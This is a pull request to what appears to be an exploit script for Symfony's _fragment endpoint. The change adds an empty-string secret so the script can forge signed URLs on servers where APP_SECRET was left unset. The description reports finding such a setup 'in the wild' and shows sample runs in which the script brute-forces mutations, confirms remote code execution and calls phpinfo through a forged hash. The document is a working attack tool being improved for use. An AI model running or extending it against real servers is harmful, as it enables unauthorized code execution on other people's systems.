### PR TITLE
Use empty string as secret key

### DIFF
--- a/secret_fragment_exploit.py
+++ b/secret_fragment_exploit.py
@@ -94,6 +94,7 @@ import sys
 
 # Collection of standard secrets
 USUAL_SECRETS = [
+    '',
     'ThisTokenIsNotSoSecretChangeIt',
     'ThisEzPlatformTokenIsNotSoSecret_PleaseChangeIt',
     'ff6dc61a329dc96652bb092ec58981f7',
@@ -351,7 +352,12 @@ def generate_mutations(url, internal_url, secret, algo):
             url.replace('http://', 'https://')
         ]
 
-    secrets = secret and [secret] or USUAL_SECRETS
+    if secret == '':
+        w('Using empty string as secret key')
+        secrets = ['']
+    else:
+        secrets = secret and [secret] or USUAL_SECRETS
+
     algos = ['sha256', 'sha1'] if not algo else [algo]
 
     return list(itertools.product(algos, secrets, internal_urls))
@@ -449,6 +455,9 @@ def o(x):
 
 def f(x):
     print('\x1b[31m' + x + '\x1b[39m')
+
+def w(x):
+    print('\x1b[33m' + x + '\x1b[39m')
 
 def e(x):
     f(x)


### PR DESCRIPTION
Hey!

I spotted a strange setup in the wild:

- application uses Synfony 3.x
- `fragments: ~` in the config file. According to the documentation, `~` means "use default", so `true` in my case :smiley: 
- no `APP_SECRET` within the phpinfo() :disappointed:
- turns out that no `APP_SECRET` means "use an empty string as secret" :partying_face: 

This PR adds the possibility to detect and use an empty string as secret key.

```shell
$ ./secret_fragment_exploit.py 'http://target.com:8000/_fragment'           
The URL /_fragment returns 403, cool

Trying 436 mutations...
  (OK) sha256  http://target.com:8000/_fragment 404 http://target.com:8000/_fragment?_path=&_hash=MJKkVui6zppmCd2GVg6uQFcb7pOjBIgea0XBDKX6dsI%3D

Trying both RCE methods...
  Method 1: Success!

PHPINFO: http://target.com:8000/_fragment?_path=_controller%3Dphpinfo%26what%3D-1&_hash=UG8T2v%2F%2BnuLZWsSjV0iTFJuH9FMFN64KNPnbvWLsg8Y%3D
RUN: ./secret_fragment_exploit.py 'http://target.com:8000/_fragment' --method 1 --secret '' --algo 'sha256' --internal-url 'http://target.com:8000/_fragment' --function phpinfo --parameters what:-1

$ ./secret_fragment_exploit.py 'http://target.com:8000/_fragment' --method 1 --secret '' --algo 'sha256' --internal-url 'http://target.com:8000/_fragment' --function phpinfo --parameters what:-1
Using empty string as secret key
http://target.com:8000/_fragment?_path=what%3D-1%26_controller%3Dphpinfo&_hash=qKZPTLl7YhrkBnNLB3ahLX4psW9coKsQvdulbWT8vU4%3D


```

:sunflower: 
